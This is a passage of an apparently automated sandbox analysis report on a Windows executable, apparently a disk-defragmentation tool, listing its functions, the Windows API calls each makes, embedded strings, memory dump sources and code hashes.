                                                                                                                                                                                                                                                                                    • Instruction ID: 3d1e85c786be0547c74fbf31f73b40b43d39c9eef0f0cab4dee81a64cc519da0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9951B2713407026BD215EB60CD9AF6F73AAEBC4B04F04491CF6459B2D0EEB4E901879A
                                                                                                                                                                                                                                                                                    Function 00424430 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 157windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 00429964
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0042998F
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: TranslateMessage.USER32(?), ref: 0042999A
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: DispatchMessageW.USER32(?), ref: 004299A1
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004299B0
                                                                                                                                                                                                                                                                                      • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 004299C9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00424612
                                                                                                                                                                                                                                                                                      • Part of subcall function 00424C20: SendMessageW.USER32(?,000010A9,?,00000000), ref: 00424C61
                                                                                                                                                                                                                                                                                      • Part of subcall function 00424C20: SetForegroundWindow.USER32(?), ref: 00424C6D
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000001,00000000), ref: 0042452F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$MultipleObjectsPeekSendWait$DispatchForegroundPostTranslateWindow
                                                                                                                                                                                                                                                                                    • String ID: "RightMenuDisk"$"RightMenuFile"$-AutoDefragmention$-BootTimeDefrag$8F$ScheduleStart
                                                                                                                                                                                                                                                                                    • API String ID: 784092869-485786108
                                                                                                                                                                                                                                                                                    • Opcode ID: ee24571ea037fb3441c670c01d318203056eea9a33b6edfe6f81c85abbded570
                                                                                                                                                                                                                                                                                    • Instruction ID: c97898347ab5420be132615685895ca4f66fbeb7c47801a8b84119e28bf46611
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee24571ea037fb3441c670c01d318203056eea9a33b6edfe6f81c85abbded570
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E251C431304310AFC300EF15EDC5A6BB7E4EBD8755F84092EF54A92291DBB89988CB5A
                                                                                                                                                                                                                                                                                    Function 00419AE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(00497F28), ref: 00419C49
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(00497F30), ref: 00419C54
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00419C70
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419C9C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PerformanceQuery$Counter$AddressFrequencyHandleModuleProcUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: NtQuerySystemInformation$ntdll
                                                                                                                                                                                                                                                                                    • API String ID: 3025674679-3593917365
                                                                                                                                                                                                                                                                                    • Opcode ID: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                    • Instruction ID: d06557f50192d5db3270ba6b6212bac26de826900838c4c68c4281c4e513f8d9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF518F71B1C301ABD7149F11FD55AAA37E4FB98780F108C3EE585A2268FB3499418BDD
                                                                                                                                                                                                                                                                                    Function 004549E0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 96fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,00000000), ref: 00454A46
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000), ref: 00454ABC
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090064,00000000,00000000,00000340,00000060,00000003,00000000), ref: 00454AE8
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00454AFA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandleInformationVolume
                                                                                                                                                                                                                                                                                    • String ID: C:\$JD$NTFS$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 1233574911-3889828498
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                    • Instruction ID: 7a7ffa21548745985fbbbea45252e330d1802da0f0ea7318edadfa9cc625902c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE311D71608300AFE320CF64D885B6BB7F8AF88714F400A2DF549D7291E7B5E584CB5A
                                                                                                                                                                                                                                                                                    Function 0042D380 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 90windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102F,?,00000000), ref: 0042D3DB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D3F8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D411
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D433
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D46C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$Selected$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3927076241
                                                                                                                                                                                                                                                                                    • Opcode ID: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                    • Instruction ID: 47af735872212f4aff9019aaa9f39296bd56d2d945b6e3696df55891068cb05b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521D8757407117BE230EB79ED82F9BA3A4AB48B55F504A1AF705A72C1CAB4F801879C
                                                                                                                                                                                                                                                                                    Function 004298F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 00429964
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0042998F
                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0042999A
                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 004299A1
                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004299B0
                                                                                                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000004FF), ref: 004299C9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                                                                                                    • String ID: 0I$@I
                                                                                                                                                                                                                                                                                    • API String ID: 1800058468-400931512
                                                                                                                                                                                                                                                                                    • Opcode ID: 422089f6943f840a1857ebeeed2a55ac56a072af819dc62ccc93b1be93c737d0
                                                                                                                                                                                                                                                                                    • Instruction ID: 4b68c3bfc8aa6a65b644341b41cfaa7d1e4508deb0fbdda8f8db971c9f13aea2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 422089f6943f840a1857ebeeed2a55ac56a072af819dc62ccc93b1be93c737d0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5316BB1604311AFE310CF68DC80F6BB7E5BB88710F504A1DF648DB290E774E9848BA6
                                                                                                                                                                                                                                                                                    Function 004275D0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                    • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                    • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                    • Opcode ID: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                    • Instruction ID: 7aa1b3021184ad304fb6d47c852e9f0d985907e1382866191d812cb31a89d144
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 872179F0A50301BBD7106BB49C4AB9A31A8AF54701F50C82BB50EE1550D7BCA8449B6D
                                                                                                                                                                                                                                                                                    Function 00416B80 Relevance: 13.6, APIs: 9, Instructions: 118windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00416BBB
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00416BCF
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00416BDE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000198,00000000,?), ref: 00416BFF
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00416C10
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000198,?,?), ref: 00416C74
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 00416C87
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00416C98
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?), ref: 00416CC7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$MessageSend$Invalidate$ClientCursorScreen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2454936240-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 41846961993d4e238d2a253bad1eeefc775d047419a5e1f45b38c98fcc342d77
                                                                                                                                                                                                                                                                                    • Instruction ID: e3b87b86549111153a689a6de42a5e443b1792048b086b4c3e38e8d95830a062
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41846961993d4e238d2a253bad1eeefc775d047419a5e1f45b38c98fcc342d77
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3413BB1208301AFC310DF65D884EABB7E9FBC8710F004A2EF59987250E775E945CBA6
                                                                                                                                                                                                                                                                                    Function 005FE841 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 005FE960
                                                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 005FEA6E
                                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 005FEBC0
                                                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 005FEBDB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                    • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                                    • Opcode ID: 08a24b7a806b8d6ec1416d2dfd391db455ed87810685ef5def1f7c42871ac48a
                                                                                                                                                                                                                                                                                    • Instruction ID: e73f2a20be353d8c2df27e872894231c1fc0a654930275ec37afaed710c64779
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08a24b7a806b8d6ec1416d2dfd391db455ed87810685ef5def1f7c42871ac48a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57B14C3180020EDFCF15EFA4C9469BEBFB6FF54310B14456AEA016B222D779DA51CBA1
                                                                                                                                                                                                                                                                                    Function 004318A0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 294windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 004318DA
                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 004319AA
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00431B90
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431BCE
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00431BEF
                                                                                                                                                                                                                                                                                    • AlphaBlend.MSIMG32(?,?,?,?,00000003,?,00000000,00000000,?,00000003,00000000,00000000,00000000,?,?,00F0F0F0), ref: 00431C5D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateRect$AlphaBitmapBlendCopyFrameObjectSelect
                                                                                                                                                                                                                                                                                    • String ID: Z
                                                                                                                                                                                                                                                                                    • API String ID: 54210234-1505515367
                                                                                                                                                                                                                                                                                    • Opcode ID: 5f029b77f6b4eb3bbc3495fe3d68357bdf896ac53e414383373f8e8c30d0e72a
                                                                                                                                                                                                                                                                                    • Instruction ID: 0792d4e533d00b1b26a73fc7749f663e28f4755597dc11c0d4e9561af80c2fe6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f029b77f6b4eb3bbc3495fe3d68357bdf896ac53e414383373f8e8c30d0e72a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DC112716083418FC724DF69C984A5BBBE5AFC8704F108A2EF58987391DB74E909CB96
                                                                                                                                                                                                                                                                                    Function 004653B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004012D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004768A9,000000FF), ref: 00401305
                                                                                                                                                                                                                                                                                      • Part of subcall function 004012D0: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,?,004768A9,000000FF), ref: 00401316
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
